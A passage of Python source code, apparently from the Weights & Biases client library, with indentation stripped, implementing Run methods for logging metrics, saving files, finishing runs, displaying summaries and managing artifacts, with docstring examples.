and increment the step. If false `wandb.log` just updates the current
metrics dict with the data argument and metrics won't be saved until
`wandb.log` is called with `commit=True`.
step: (integer, optional) The global step in processing. This persists
any non-committed earlier steps but defaults to not committing the
specified step.
sync: (boolean, optional) This argument is deprecated and currently doesn't
change the behaviour of `wandb.log`.
Examples:
Basic usage
```python
wandb.log({'accuracy': 0.9, 'epoch': 5})
```
Incremental logging
```python
wandb.log({'loss': 0.2}, commit=False)
# Somewhere else when I'm ready to report this step:
wandb.log({'accuracy': 0.8})
```
Histogram
```python
wandb.log({"gradients": wandb.Histogram(numpy_array_or_sequence)})
```
Image
```python
wandb.log({"examples": [wandb.Image(numpy_array_or_pil, caption="Label")]})
```
Video
```python
wandb.log({"video": wandb.Video(numpy_array_or_video_path, fps=4,
format="gif")})
```
Matplotlib Plot
```python
wandb.log({"chart": plt})
```
PR Curve
```python
wandb.log({'pr': wandb.plots.precision_recall(y_test, y_probas, labels)})
```
3D Object
```python
wandb.log({"generated_samples":
[wandb.Object3D(open("sample.obj")),
wandb.Object3D(open("sample.gltf")),
wandb.Object3D(open("sample.glb"))]})
```
For more examples, see https://docs.wandb.com/library/log
Raises:
wandb.Error: if called before `wandb.init`
ValueError: if invalid data is passed
"""
current_pid = os.getpid()
if current_pid != self._pid:
message = "log() ignored (called from pid={}, init called from pid={}). See: https://docs.wandb.ai/library/init#multiprocess".format(
current_pid, self._pid
)
if self._settings._strict:
wandb.termerror(message, repeat=False)
raise errors.LogMultiprocessError(
"log() does not support multiprocessing"
)
wandb.termwarn(message, repeat=False)
return
if not isinstance(data, Mapping):
raise ValueError("wandb.log must be passed a dictionary")
if any(not isinstance(key, string_types) for key in data.keys()):
raise ValueError("Key values passed to `wandb.log` must be strings.")
if step is not None:
# if step is passed in when tensorboard_sync is used we honor the step passed
# to make decisions about how to close out the history record, but will strip
# this history later on in publish_history()
using_tensorboard = len(wandb.patched["tensorboard"]) > 0
if using_tensorboard:
wandb.termwarn(
"Step cannot be set when using syncing with tensorboard. Please log your step values as a metric such as 'global_step'",
repeat=False,
)
if self.history._step > step:
wandb.termwarn(
(
"Step must only increase in log calls. "
"Step {} < {}; dropping {}.".format(
step, self.history._step, data
)
)
)
return
elif step > self.history._step:
self.history._flush()
self.history._step = step
elif commit is None:
commit = True
if commit:
self.history._row_add(data)
else:
self.history._row_update(data)
def save(
self,
glob_str = None,
base_path = None,
policy = "live",
):
""" Ensure all files matching `glob_str` are synced to wandb with the policy specified.
Arguments:
glob_str: (string) a relative or absolute path to a unix glob or regular
path. If this isn't specified the method is a noop.
base_path: (string) the base path to run the glob relative to
policy: (string) one of `live`, `now`, or `end`
- live: upload the file as it changes, overwriting the previous version
- now: upload the file once now
- end: only upload file when the run ends
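Examples:
A minimal sketch (the file names and base_path are placeholders):
```python
import wandb

run = wandb.init()
# upload the checkpoint now and re-upload it whenever it changes
run.save("checkpoint.h5", policy="live")
# preserve the directory structure under /mnt
run.save("/mnt/folder/file.h5", base_path="/mnt", policy="now")
```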
"""
if glob_str is None:
# noop for historical reasons, run.save() may be called in legacy code
wandb.termwarn(
(
"Calling run.save without any arguments is deprecated."
"Changes to attributes are automatically persisted."
)
)
return True
if policy not in ("live", "end", "now"):
raise ValueError(
'Only "live" "end" and "now" policies are currently supported.'
)
if isinstance(glob_str, bytes):
glob_str = glob_str.decode("utf-8")
if not isinstance(glob_str, string_types):
raise ValueError("Must call wandb.save(glob_str) with glob_str a str")
if base_path is None:
if os.path.isabs(glob_str):
base_path = os.path.dirname(glob_str)
wandb.termwarn(
(
"Saving files without folders. If you want to preserve "
"sub directories pass base_path to wandb.save, i.e. "
'wandb.save("/mnt/folder/file.h5", base_path="/mnt")'
)
)
else:
base_path = "."
wandb_glob_str = os.path.relpath(glob_str, base_path)
if ".." + os.sep in wandb_glob_str:
raise ValueError("globs can't walk above base_path")
with telemetry.context(run=self) as tel:
tel.feature.save = True
if glob_str.startswith("gs://") or glob_str.startswith("s3://"):
wandb.termlog(
"%s is a cloud storage url, can't save file to wandb." % glob_str
)
return []
files = glob.glob(os.path.join(self.dir, wandb_glob_str))
warn = False
if len(files) == 0 and "*" in wandb_glob_str:
warn = True
for path in glob.glob(glob_str):
file_name = os.path.relpath(path, base_path)
abs_path = os.path.abspath(path)
wandb_path = os.path.join(self.dir, file_name)
wandb.util.mkdir_exists_ok(os.path.dirname(wandb_path))
# We overwrite symlinks because namespaces can change in Tensorboard
if os.path.islink(wandb_path) and abs_path != os.readlink(wandb_path):
os.remove(wandb_path)
os.symlink(abs_path, wandb_path)
elif not os.path.exists(wandb_path):
os.symlink(abs_path, wandb_path)
files.append(wandb_path)
if warn:
file_str = "%i file" % len(files)
if len(files) > 1:
file_str += "s"
wandb.termwarn(
(
"Symlinked %s into the W&B run directory, "
"call wandb.save again to sync new files."
)
% file_str
)
files_dict = dict(files=[(wandb_glob_str, policy)])
if self._backend:
self._backend.interface.publish_files(files_dict)
return files
def restore(
self,
name,
run_path = None,
replace = False,
root = None,
):
return restore(name, run_path or self.path, replace, root or self.dir)
def finish(self, exit_code = None):
"""Marks a run as finished, and finishes uploading all data. This is
used when creating multiple runs in the same process. We automatically
call this method when your script exits.
"""
with telemetry.context(run=self) as tel:
tel.feature.finish = True
# detach logger, other setup cleanup
logger.info("finishing run %s", self.path)
for hook in self._teardown_hooks:
hook()
self._teardown_hooks = []
self._atexit_cleanup(exit_code=exit_code)
if self._wl and len(self._wl._global_run_stack) > 0:
self._wl._global_run_stack.pop()
module.unset_globals()
def join(self, exit_code = None):
"""Deprecated alias for `finish()` - please use finish"""
self.finish(exit_code=exit_code)
# TODO(jhr): annotate this
def plot_table(self, vega_spec_name, data_table, fields, string_fields=None): # type: ignore
"""Creates a custom plot on a table.
Arguments:
vega_spec_name: the name of the spec for the plot
data_table: a wandb.Table object containing the data to
be used on the visualization
fields: a dict mapping from table keys to fields that the custom
visualization needs
string_fields: a dict that provides values for any string constants
the custom visualization needs
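Example:
An illustrative sketch using the built-in line preset; the spec name,
table contents, and field mapping are placeholders for your own:
```python
import wandb

run = wandb.init()
table = wandb.Table(data=[[1, 0.9], [2, 0.6]], columns=["step", "loss"])
chart = run.plot_table(
    vega_spec_name="wandb/line/v0",
    data_table=table,
    fields={"x": "step", "y": "loss"},
    string_fields={"title": "Loss curve"},
)
run.log({"loss_curve": chart})
```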
"""
visualization = create_custom_chart(
vega_spec_name, data_table, fields, string_fields or {}
)
return visualization
def _set_upgraded_version_message(self, msg):
self._upgraded_version_message = msg
def _set_deleted_version_message(self, msg):
self._deleted_version_message = msg
def _set_yanked_version_message(self, msg):
self._yanked_version_message = msg
def _add_panel(
self, visualize_key, panel_type, panel_config
):
config = {
"panel_type": panel_type,
"panel_config": panel_config,
}
self._config_callback(val=config, key=("_wandb", "visualize", visualize_key))
def _get_url_query_string(self):
s = self._settings
# TODO(jhr): migrate to new settings, but for now this is safer
api = internal.Api()
if api.settings().get("anonymous") != "true":
return ""
api_key = apikey.api_key(settings=s)
return "?" + urlencode({"apiKey": api_key})
def _get_project_url(self):
s = self._settings
r = self._run_obj
if not r:
return ""
app_url = wandb.util.app_url(s.base_url)
qs = self._get_url_query_string()
url = "{}/{}/{}{}".format(
app_url, url_quote(r.entity), url_quote(r.project), qs
)
return url
def _get_run_url(self):
s = self._settings
r = self._run_obj
if not r:
return ""
app_url = wandb.util.app_url(s.base_url)
qs = self._get_url_query_string()
url = "{}/{}/{}/runs/{}{}".format(
app_url, url_quote(r.entity), url_quote(r.project), url_quote(r.run_id), qs
)
return url
def _get_sweep_url(self):
"""Generate a url for a sweep.
Returns:
(str): url if the run is part of a sweep
(str): an empty string if the run is not part of a sweep
"""
r = self._run_obj
if not r:
return ""
sweep_id = r.sweep_id
if not sweep_id:
return ""
app_url = wandb.util.app_url(self._settings.base_url)
qs = self._get_url_query_string()
return "{base}/{entity}/{project}/sweeps/{sweepid}{qs}".format(
base=app_url,
entity=url_quote(r.entity),
project=url_quote(r.project),
sweepid=url_quote(sweep_id),
qs=qs,
)
def _get_run_name(self):
r = self._run_obj
if not r:
return ""
return r.display_name
def _display_run(self):
project_url = self._get_project_url()
run_url = self._get_run_url()
sweep_url = self._get_sweep_url()
version_str = "Tracking run with wandb version {}".format(wandb.__version__)
if self.resumed:
run_state_str = "Resuming run"
else:
run_state_str = "Syncing run"
run_name = self._get_run_name()
app_url = wandb.util.app_url(self._settings.base_url)
sync_dir = self._settings._sync_dir
if self._settings._jupyter:
sync_dir = "<code>{}</code>".format(sync_dir)
dir_str = "Run data is saved locally in {}".format(sync_dir)
if self._settings._jupyter and ipython._get_python_type() == "jupyter":
sweep_line = (
'Sweep page: <a href="{}" target="_blank">{}</a><br/>\n'.format(
sweep_url, sweep_url
)
if sweep_url
else ""
)
docs_html = '<a href="https://docs.wandb.com/integrations/jupyter.html" target="_blank">(Documentation)</a>' # noqa: E501
ipython.display_html(
"""
{}<br/>
{} <strong style="color:{}">{}</strong> to <a href="{}" target="_blank">Weights & Biases</a> {}.<br/>
Project page: <a href="{}" target="_blank">{}</a><br/>
{}Run page: <a href="{}" target="_blank">{}</a><br/>
{}<br/><br/>
""".format( # noqa: E501
version_str,
run_state_str,
RUN_NAME_COLOR,
run_name,
app_url,
docs_html,
project_url,
project_url,
sweep_line,
run_url,
run_url,
dir_str,
)
)
else:
wandb.termlog(version_str)
wandb.termlog(
"{} {}".format(run_state_str, click.style(run_name, fg="yellow"))
)
emojis = dict(star="", broom="", rocket="")
if platform.system() != "Windows" and sys.stdout.encoding == "UTF-8":
emojis = dict(star="⭐️", broom="🧹", rocket="🚀")
wandb.termlog(
"{} View project at {}".format(
emojis.get("star", ""),
click.style(project_url, underline=True, fg="blue"),
)
)
if sweep_url:
wandb.termlog(
"{} View sweep at {}".format(
emojis.get("broom", ""),
click.style(sweep_url, underline=True, fg="blue"),
)
)
wandb.termlog(
"{} View run at {}".format(
emojis.get("rocket", ""),
click.style(run_url, underline=True, fg="blue"),
)
)
wandb.termlog(dir_str)
if not self._settings._offline:
wandb.termlog("Run `wandb offline` to turn off syncing.")
print("")
def _redirect(
self,
stdout_slave_fd,
stderr_slave_fd,
console = None,
):
if console is None:
console = self._settings._console
logger.info("redirect: %s", console)
# out_redir: redirect.RedirectBase
# err_redir: redirect.RedirectBase
if console == self._settings.Console.REDIRECT:
logger.info("Redirecting console.")
out_redir = redirect.Redirect(
src="stdout",
cbs=[
lambda data: self._redirect_cb("stdout", data), # type: ignore
self._output_writer.write, # type: ignore
],
)
err_redir = redirect.Redirect(
src="stderr",
cbs=[
lambda data: self._redirect_cb("stderr", data), # type: ignore
self._output_writer.write, # type: ignore
],
)
if os.name == "nt":
def wrap_fallback():
if self._out_redir:
self._out_redir.uninstall()
if self._err_redir:
self._err_redir.uninstall()
msg = (
"Tensorflow detected. Stream redirection is not supported "
"on Windows when tensorflow is imported. Falling back to "
"wrapping stdout/err."
)
wandb.termlog(msg)
self._redirect(None, None, console=self._settings.Console.WRAP)
add_import_hook("tensorflow", wrap_fallback)
elif console == self._settings.Console.WRAP:
logger.info("Wrapping output streams.")
out_redir = redirect.StreamWrapper(
src="stdout",
cbs=[
lambda data: self._redirect_cb("stdout", data), # type: ignore
self._output_writer.write, # type: ignore
],
)
err_redir = redirect.StreamWrapper(
src="stderr",
cbs=[
lambda data: self._redirect_cb("stderr", data), # type: ignore
self._output_writer.write, # type: ignore
],
)
elif console == self._settings.Console.OFF:
return
else:
raise ValueError("unhandled console")
try:
out_redir.install()
err_redir.install()
self._out_redir = out_redir
self._err_redir = err_redir
logger.info("Redirects installed.")
except Exception as e:
print(e)
logger.error("Failed to redirect.", exc_info=e)
return
def _restore(self):
logger.info("restore")
# TODO(jhr): drain and shutdown all threads
if self._use_redirect:
if self._out_redir:
self._out_redir.uninstall()
if self._err_redir:
self._err_redir.uninstall()
return
if self.stdout_redirector:
self.stdout_redirector.restore()
if self.stderr_redirector:
self.stderr_redirector.restore()
if self._save_stdout:
sys.stdout = self._save_stdout
if self._save_stderr:
sys.stderr = self._save_stderr
logger.info("restore done")
def _atexit_cleanup(self, exit_code = None):
if self._backend is None:
logger.warning("process exited without backend configured")
return
if self._atexit_cleanup_called:
return
self._atexit_cleanup_called = True
exit_code = exit_code or (self._hooks.exit_code if self._hooks else 0)
logger.info("got exitcode: %d", exit_code)
if exit_code == 0:
# Cleanup our resume file on a clean exit
if os.path.exists(self._settings.resume_fname):
os.remove(self._settings.resume_fname)
self._exit_code = exit_code
try:
self._on_finish()
except KeyboardInterrupt as ki:
if wandb.wandb_agent._is_running():
raise ki
wandb.termerror("Control-C detected -- Run data was not synced")
if ipython._get_python_type() == "python":
os._exit(-1)
except Exception as e:
self._console_stop()
self._backend.cleanup()
logger.error("Problem finishing run", exc_info=e)
wandb.termerror("Problem finishing run")
traceback.print_exception(*sys.exc_info())
if ipython._get_python_type() == "python":
os._exit(-1)
else:
# if silent, skip this as it is used to output stuff
if self._settings._silent:
return
self._on_final()
def _console_start(self):
logger.info("atexit reg")
self._hooks = ExitHooks()
self._hooks.hook()
atexit.register(lambda: self._atexit_cleanup())
if self._use_redirect:
# setup fake callback
self._redirect_cb = self._console_callback
output_log_path = os.path.join(self.dir, filenames.OUTPUT_FNAME)
self._output_writer = filesystem.CRDedupedFile(open(output_log_path, "wb"))
self._redirect(self._stdout_slave_fd, self._stderr_slave_fd)
def _console_stop(self):
self._restore()
if self._output_writer:
self._output_writer.close()
self._output_writer = None
def _on_init(self):
self._show_version_info()
def _on_start(self):
# TODO: make offline mode in jupyter use HTML
if self._settings._offline:
wandb.termlog(
(
"W&B syncing is set to `offline` in this directory. "
"Run `wandb online` or set WANDB_MODE=online to enable cloud syncing."
)
)
if self._settings.save_code and self._settings.code_dir is not None:
self.log_code(self._settings.code_dir)
if self._run_obj and not self._settings._silent:
self._display_run()
if self._backend and not self._settings._offline:
self._run_status_checker = RunStatusChecker(self._backend.interface)
self._console_start()
def _pusher_print_status(
self,
progress,
prefix = True,
done = False,
):
if self._settings._offline:
return
line = " %.2fMB of %.2fMB uploaded (%.2fMB deduped)\r" % (
progress.uploaded_bytes / 1048576.0,
progress.total_bytes / 1048576.0,
progress.deduped_bytes / 1048576.0,
)
if self._jupyter_progress:
# percent_done: float
if progress.total_bytes == 0:
percent_done = 1
else:
percent_done = progress.uploaded_bytes / progress.total_bytes
self._jupyter_progress.update(percent_done, line)
if done:
self._jupyter_progress.close()
elif not self._settings._jupyter:
spinner_states = ["-", "\\", "|", "/"]
line = spinner_states[self._progress_step % 4] + line
self._progress_step += 1
wandb.termlog(line, newline=False, prefix=prefix)
if done:
dedupe_fraction = (
progress.deduped_bytes / float(progress.total_bytes)
if progress.total_bytes > 0
else 0
)
if dedupe_fraction > 0.01:
wandb.termlog(
"W&B sync reduced upload amount by %.1f%% "
% (dedupe_fraction * 100),
prefix=prefix,
)
# clear progress line.
wandb.termlog(" " * 79, prefix=prefix)
def _on_finish_progress(self, progress, done = None):
self._pusher_print_status(progress, done=done)
def _wait_for_finish(self):
while True:
if self._backend:
poll_exit_resp = self._backend.interface.communicate_poll_exit()
logger.info("got exit ret: %s", poll_exit_resp)
if poll_exit_resp:
done = poll_exit_resp.done
pusher_stats = poll_exit_resp.pusher_stats
if pusher_stats:
self._on_finish_progress(pusher_stats, done)
if done:
return poll_exit_resp
time.sleep(0.1)
def _on_finish(self):
trigger.call("on_finished")
# populate final import telemetry
with telemetry.context(run=self) as tel:
self._telemetry_imports(tel.imports_finish)
if self._run_status_checker:
self._run_status_checker.stop()
# make sure all uncommitted history is flushed
self.history._flush()
self._console_stop() # TODO: there's a race here with jupyter console logging
if not self._settings._silent:
if self._backend:
pid = self._backend._internal_pid
status_str = "Waiting for W&B process to finish, PID {}".format(pid)
if not self._exit_code:
status_str += "\nProgram ended successfully."
else:
status_str += "\nProgram failed with code {}. ".format(self._exit_code)
if not self._settings._offline:
status_str += " Press ctrl-c to abort syncing."
if self._settings._jupyter and ipython._get_python_type() == "jupyter":
ipython.display_html("<br/>" + status_str.replace("\n", "<br/>"))
else:
print("")
wandb.termlog(status_str)
# telemetry could have changed, publish final data
if self._backend:
self._backend.interface.publish_telemetry(self._telemetry_obj)
# TODO: we need to handle catastrophic failure better
# some tests were timing out on sending exit for reasons not clear to me
if self._backend:
self._backend.interface.publish_exit(self._exit_code)
# Wait for data to be synced
self._poll_exit_response = self._wait_for_finish()
if self._backend:
ret = self._backend.interface.communicate_summary()
self._final_summary = proto_util.dict_from_proto_list(ret.item)
if self._backend:
ret = self._backend.interface.communicate_sampled_history()
d = {item.key: item.values_float or item.values_int for item in ret.item}
self._sampled_history = d
if self._backend:
self._backend.cleanup()
if self._run_status_checker:
self._run_status_checker.join()
def _on_final(self):
# check for warnings and errors, show log file locations
if self._reporter:
# TODO: handle warnings and errors nicely in jupyter
warning_lines = self._reporter.warning_lines
if warning_lines:
wandb.termlog("Warnings:")
for line in warning_lines:
wandb.termlog(line)
if len(warning_lines) < self._reporter.warning_count:
wandb.termlog("More warnings")
error_lines = self._reporter.error_lines
if error_lines:
wandb.termlog("Errors:")
for line in error_lines:
wandb.termlog(line)
if len(error_lines) < self._reporter.error_count:
wandb.termlog("More errors")
if self._settings.log_user:
log_user = self._settings.log_user
if self._settings._jupyter:
log_user = "<code>{}</code>".format(log_user)
log_str = "Find user logs for this run at: {}".format(log_user)
if self._settings._jupyter and ipython._get_python_type() == "jupyter":
ipython.display_html(log_str)
else:
wandb.termlog(log_str)
if self._settings.log_internal:
log_internal = self._settings.log_internal
if self._settings._jupyter:
log_internal = "<code>{}</code>".format(log_internal)
log_str = "Find internal logs for this run at: {}".format(log_internal)
if self._settings._jupyter and ipython._get_python_type() == "jupyter":
ipython.display_html(log_str)
else:
wandb.termlog(log_str)
self._show_summary()
self._show_history()
self._show_files()
if self._run_obj:
run_url = self._get_run_url()
run_name = self._get_run_name()
if self._settings._jupyter and ipython._get_python_type() == "jupyter":
ipython.display_html(
"""
<br/>Synced <strong style="color:{}">{}</strong>: <a href="{}" target="_blank">{}</a><br/>
""".format(
RUN_NAME_COLOR, run_name, run_url, run_url
)
)
else:
wandb.termlog(
"\nSynced {}: {}".format(
click.style(run_name, fg="yellow"),
click.style(run_url, fg="blue"),
)
)
if self._settings._offline:
# TODO: handle jupyter offline messages
wandb.termlog("You can sync this run to the cloud by running:")
wandb.termlog(
click.style(
"wandb sync {}".format(self._settings._sync_dir), fg="yellow"
)
)
self._show_version_info(footer=True)
def _show_version_info(self, footer = None):
package_problem = False
if self._deleted_version_message:
wandb.termerror(self._deleted_version_message)
package_problem = True
elif self._yanked_version_message:
wandb.termwarn(self._yanked_version_message)
package_problem = True
# only display upgrade message if packages are bad or in header
if not footer or package_problem:
if self._upgraded_version_message:
wandb.termlog(self._upgraded_version_message)
def _show_summary(self):
if self._final_summary:
logger.info("rendering summary")
max_len = max([len(k) for k in self._final_summary.keys()])
format_str = " {:>%s} {}" % max_len
summary_rows = []
for k, v in iteritems(self._final_summary):
# arrays etc. might be too large. for now we just don't print them
if isinstance(v, string_types):
if len(v) >= 20:
v = v[:20] + "..."
summary_rows.append((k, v))
elif isinstance(v, numbers.Number):
if isinstance(v, float):
v = round(v, 5)
summary_rows.append((k, v))
if self._settings._jupyter and ipython._get_python_type() == "jupyter":
summary_table = ipython.STYLED_TABLE_HTML
for row in summary_rows:
summary_table += "<tr><td>{}</td><td>{}</td></tr>".format(*row)
summary_table += "</table>"
ipython.display_html("<h3>Run summary:</h3><br/>" + summary_table)
else:
summary_lines = "\n".join(
[format_str.format(k, v) for k, v in summary_rows]
)
wandb.termlog("Run summary:")
wandb.termlog(summary_lines)
def _show_history(self):
if not self._sampled_history:
return
# Only print sparklines if the terminal is utf-8
# In some python 2.7 tests sys.stdout is a 'cStringIO.StringO' object
# which doesn't have the attribute 'encoding'
encoding = getattr(sys.stdout, "encoding", None)
if not encoding or encoding.upper() not in ("UTF_8", "UTF-8",):
return
logger.info("rendering history")
max_len = max([len(k) for k in self._sampled_history])
history_rows = []
for key in self._sampled_history:
vals = wandb.util.downsample(self._sampled_history[key], 40)
if any((not isinstance(v, numbers.Number) for v in vals)):
continue
line = sparkline.sparkify(vals)
history_rows.append((key, line))
if self._settings._jupyter and ipython._get_python_type() == "jupyter":
history_table = ipython.STYLED_TABLE_HTML
for row in history_rows:
history_table += "<tr><td>{}</td><td>{}</td></tr>".format(*row)
history_table += "</table>"
ipython.display_html("<h3>Run history:</h3><br/>" + history_table + "<br/>")
else:
wandb.termlog("Run history:")
history_lines = ""
format_str = " {:>%s} {}\n" % max_len
for row in history_rows:
history_lines += format_str.format(*row)
wandb.termlog(history_lines)
def _show_files(self):
if not self._poll_exit_response or not self._poll_exit_response.file_counts:
return
if self._settings._offline:
return
logger.info("logging synced files")
if self._settings._silent:
return
file_str = "Synced {} W&B file(s), {} media file(s), {} artifact file(s) and {} other file(s)".format( # noqa:E501
self._poll_exit_response.file_counts.wandb_count,
self._poll_exit_response.file_counts.media_count,
self._poll_exit_response.file_counts.artifact_count,
self._poll_exit_response.file_counts.other_count,
)
if self._settings._jupyter and ipython._get_python_type() == "jupyter":
ipython.display_html(file_str)
else:
wandb.termlog(file_str)
def _save_job_spec(self):
envdict = dict(python="python3.6", requirements=[],)
varsdict = {"WANDB_DISABLE_CODE": "True"}
source = dict(
git="git@github.com:wandb/examples.git", branch="master", commit="bbd8d23",
)
execdict = dict(
program="train.py",
directory="keras-cnn-fashion",
envvars=varsdict,
args=[],
)
configdict = (dict(self._config),)
artifactsdict = dict(dataset="v1",)
inputdict = dict(config=configdict, artifacts=artifactsdict,)
job_spec = {
"kind": "WandbJob",
"version": "v0",
"environment": envdict,
"source": source,
"exec": execdict,
"input": inputdict,
}
s = json.dumps(job_spec, indent=4)
spec_filename = filenames.JOBSPEC_FNAME
with open(spec_filename, "w") as f:
print(s, file=f)
self.save(spec_filename)
def define_metric(
self,
name,
step_metric = None,
step_sync = None,
hidden = None,
summary = None,
goal = None,
overwrite = None,
**kwargs
):
"""Define metric properties which will later be logged with `wandb.log()`.
Arguments:
name: Name of the metric.
step_metric: Independent variable associated with the metric.
step_sync: Automatically add `step_metric` to history if needed.
Defaults to True if step_metric is specified.
hidden: Hide this metric from automatic plots.
summary: Specify aggregate metrics added to summary.
Supported aggregations: "min,max,mean,best,last,copy,none"
Default aggregation is `copy`
Aggregation `best` defaults to `goal`==`minimize`
goal: Specify direction for optimizing the metric.
Supported directions: "minimize,maximize"
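Example:
A minimal sketch (the metric names are placeholders):
```python
import wandb

run = wandb.init()
# log val_loss against a custom "epoch" axis and keep the minimum in summary
run.define_metric("epoch")
run.define_metric("val_loss", step_metric="epoch", summary="min")
run.log({"epoch": 1, "val_loss": 0.4})
```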
Returns:
A metric object is returned that can be further specified.
"""
if not name:
raise wandb.Error("define_metric() requires non-empty name argument")
for k in kwargs:
wandb.termwarn("Unhandled define_metric() arg: {}".format(k))
if isinstance(step_metric, wandb_metric.Metric):
step_metric = step_metric.name
for arg_name, arg_val, exp_type in (
("name", name, string_types),
("step_metric", step_metric, string_types),
("step_sync", step_sync, bool),
("hidden", hidden, bool),
("summary", summary, string_types),
("goal", goal, string_types),
("overwrite", overwrite, bool),
):
# NOTE: type checking is broken for isinstance and string_types
if arg_val is not None and not isinstance(arg_val, exp_type): # type: ignore
arg_type = type(arg_val).__name__
raise wandb.Error(
"Unhandled define_metric() arg: {} type: {}".format(
arg_name, arg_type
)
)
stripped = name[:-1] if name.endswith("*") else name
if "*" in stripped:
raise wandb.Error(
"Unhandled define_metric() arg: name (glob suffixes only): {}".format(
name
)
)
summary_ops = None
if summary:
summary_items = [s.lower() for s in summary.split(",")]
summary_ops = []
valid = {"min", "max", "mean", "best", "last", "copy", "none"}
for i in summary_items:
if i not in valid:
raise wandb.Error(
"Unhandled define_metric() arg: summary op: {}".format(i)
)
summary_ops.append(i)
goal_cleaned = None
if goal is not None:
goal_cleaned = goal[:3].lower()
valid_goal = {"min", "max"}
if goal_cleaned not in valid_goal:
raise wandb.Error(
"Unhandled define_metric() arg: goal: {}".format(goal)
)
m = wandb_metric.Metric(
name=name,
step_metric=step_metric,
step_sync=step_sync,
summary=summary_ops,
hidden=hidden,
goal=goal_cleaned,
overwrite=overwrite,
)
m._set_callback(self._metric_callback)
m._commit()
with telemetry.context(run=self) as tel:
tel.feature.metric = True
return m
# TODO(jhr): annotate this
def watch(self, models, criterion=None, log="gradients", log_freq=100, idx=None): # type: ignore
wandb.watch(models, criterion, log, log_freq, idx)
# TODO(jhr): annotate this
def use_artifact(self, artifact_or_name, type=None, aliases=None): # type: ignore
""" Declare an artifact as an input to a run, call `download` or `file` on
the returned object to get the contents locally.
Arguments:
artifact_or_name: (str or Artifact) An artifact name.
May be prefixed with entity/project. Valid names
can be in the following forms:
- name:version
- name:alias
- digest
You can also pass an Artifact object created by calling `wandb.Artifact`
type: (str, optional) The type of artifact to use.
aliases: (list, optional) Aliases to apply to this artifact
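Example:
A minimal sketch (the artifact name and type are placeholders):
```python
import wandb

run = wandb.init()
artifact = run.use_artifact("mnist-dataset:latest", type="dataset")
data_dir = artifact.download()
```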
Returns:
An `Artifact` object.
"""
r = self._run_obj
api = internal.Api(default_settings={"entity": r.entity, "project": r.project})
api.set_current_run_id(self.id)
if isinstance(artifact_or_name, str):
name = artifact_or_name
public_api = self._public_api()
artifact = public_api.artifact(type=type, name=name)
if type is not None and type != artifact.type:
raise ValueError(
"Supplied type {} does not match type {} of artifact {}".format(
type, artifact.type, artifact.name
)
)
api.use_artifact(artifact.id)
return artifact
else:
artifact = artifact_or_name
if aliases is None:
aliases = []
elif isinstance(aliases, str):
aliases = [aliases]
if isinstance(artifact_or_name, wandb.Artifact):
self._log_artifact(
artifact, aliases, is_user_created=True, use_after_commit=True
)
return artifact
elif isinstance(artifact, public.Artifact):
api.use_artifact(artifact.id)
return artifact
else:
raise ValueError(
'You must pass an artifact name (e.g. "pedestrian-dataset:v1"), an instance of wandb.Artifact, or wandb.Api().artifact() to use_artifact' # noqa: E501
)
def log_artifact(
self,
artifact_or_path,
name = None,
type = None,
aliases = None,
):
""" Declare an artifact as output of a run.
Arguments:
artifact_or_path: (str or Artifact) A path to the contents of this artifact,
can be in the following forms:
- `/local/directory`
- `/local/directory/file.txt`
- `s3://bucket/path`
You can also pass an Artifact object created by calling
`wandb.Artifact`.
name: (str, optional) An artifact name. May be prefixed with entity/project.
Valid names can be in the following forms:
- name:version
- name:alias
- digest
This will default to the basename of the path prepended with the current
run id if not specified.
type: (str) The type of artifact to log, examples include `dataset`, `model`
aliases: (list, optional) Aliases to apply to this artifact,
defaults to `["latest"]`
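Example:
A minimal sketch (the file, artifact name, and type are placeholders):
```python
import wandb

run = wandb.init()
artifact = wandb.Artifact("my-model", type="model")
artifact.add_file("model.h5")
run.log_artifact(artifact, aliases=["latest", "best"])
```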
Returns:
An `Artifact` object.
"""
return self._log_artifact(artifact_or_path, name, type, aliases)
def upsert_artifact(
self,
artifact_or_path,
name = None,
type = None,
aliases = None,
distributed_id = None,
):
""" Declare (or append tp) a non-finalized artifact as output of a run. Note that you must call
run.finish_artifact() to finalize the artifact. This is useful when distributed jobs
need to all contribute to the same artifact.
Arguments:
artifact_or_path: (str or Artifact) A path to the contents of this artifact,
can be in the following forms:
- `/local/directory`
- `/local/directory/file.txt`
- `s3://bucket/path`
You can also pass an Artifact object created by calling
`wandb.Artifact`.
name: (str, optional) An artifact name. May be prefixed with entity/project.
Valid names can be in the following forms:
- name:version
- name:alias
- digest
This will default to the basename of the path prepended with the current
run id if not specified.
type: (str) The type of artifact to log, examples include `dataset`, `model`
aliases: (list, optional) Aliases to apply to this artifact,
defaults to `["latest"]`
distributed_id: (string, optional) Unique string that all distributed jobs share. If None,
defaults to the run's group name.
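Example:
A minimal sketch of the distributed workflow (the paths, names, and
distributed_id are placeholders):
```python
import wandb

run = wandb.init(group="dist-job")
# each worker appends its shard to the same pending artifact
run.upsert_artifact("outputs/shard-0", name="predictions", type="dataset",
                    distributed_id="dist-job")
# once every worker is done, one process finalizes the artifact
run.finish_artifact("outputs/final", name="predictions", type="dataset",
                    distributed_id="dist-job")
```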
Returns:
An `Artifact` object.
"""
if self.group == "" and distributed_id is None:
raise TypeError(
"Cannot upsert artifact unless run is in a group or distributed_id is provided"
)
if distributed_id is None:
distributed_id = self.group
return self._log_artifact(
artifact_or_path,
name,
type,
aliases,
distributed_id=distributed_id,
finalize=False,
)
def finish_artifact(
self,
artifact_or_path,
name = None,
type = None,
aliases = None,
distributed_id = None,
):
""" Finish a non-finalized artifact as output of a run. Subsequent "upserts" with
the same distributed ID will result in a new version.
Arguments:
artifact_or_path: (str or Artifact) A path to the contents of this artifact,
can be in the following forms:
- `/local/directory`
- `/local/directory/file.txt`
- `s3://bucket/path`
You can also pass an Artifact object created by calling
`wandb.Artifact`.
name: (str, optional) An artifact name. May be prefixed with entity/project.
Valid names can be in the following forms:
- name:version
- name:alias
- digest
This will default to the basename of the path prepended with the current
run id if not specified.
type: (str) The type of artifact to log, examples include `dataset`, `model`
aliases: (list, optional) Aliases to apply to this artifact,
defaults to `["latest"]`
distributed_id: (string, optional) Unique string that all distributed jobs share. If None,
defaults to the run's group name.
Returns:
An `Artifact` object.
"""
if self.group == "" and distributed_id is None:
raise TypeError(
"Cannot finish artifact unless run is in a group or distributed_id is provided"
)
if distributed_id is None:
distributed_id = self.group
return self._log_artifact(
artifact_or_path,
name,
type,
aliases,
distributed_id=distributed_id,
finalize=True,
)
def _log_artifact(
self,
artifact_or_path,
name = None,
type = None,
aliases = None,
distributed_id = None,
finalize = True,
is_user_created = False,
use_after_commit = False,
):
if not finalize and distributed_id is None:
raise TypeError("Must provide distributed_id if artifact is not finalize")
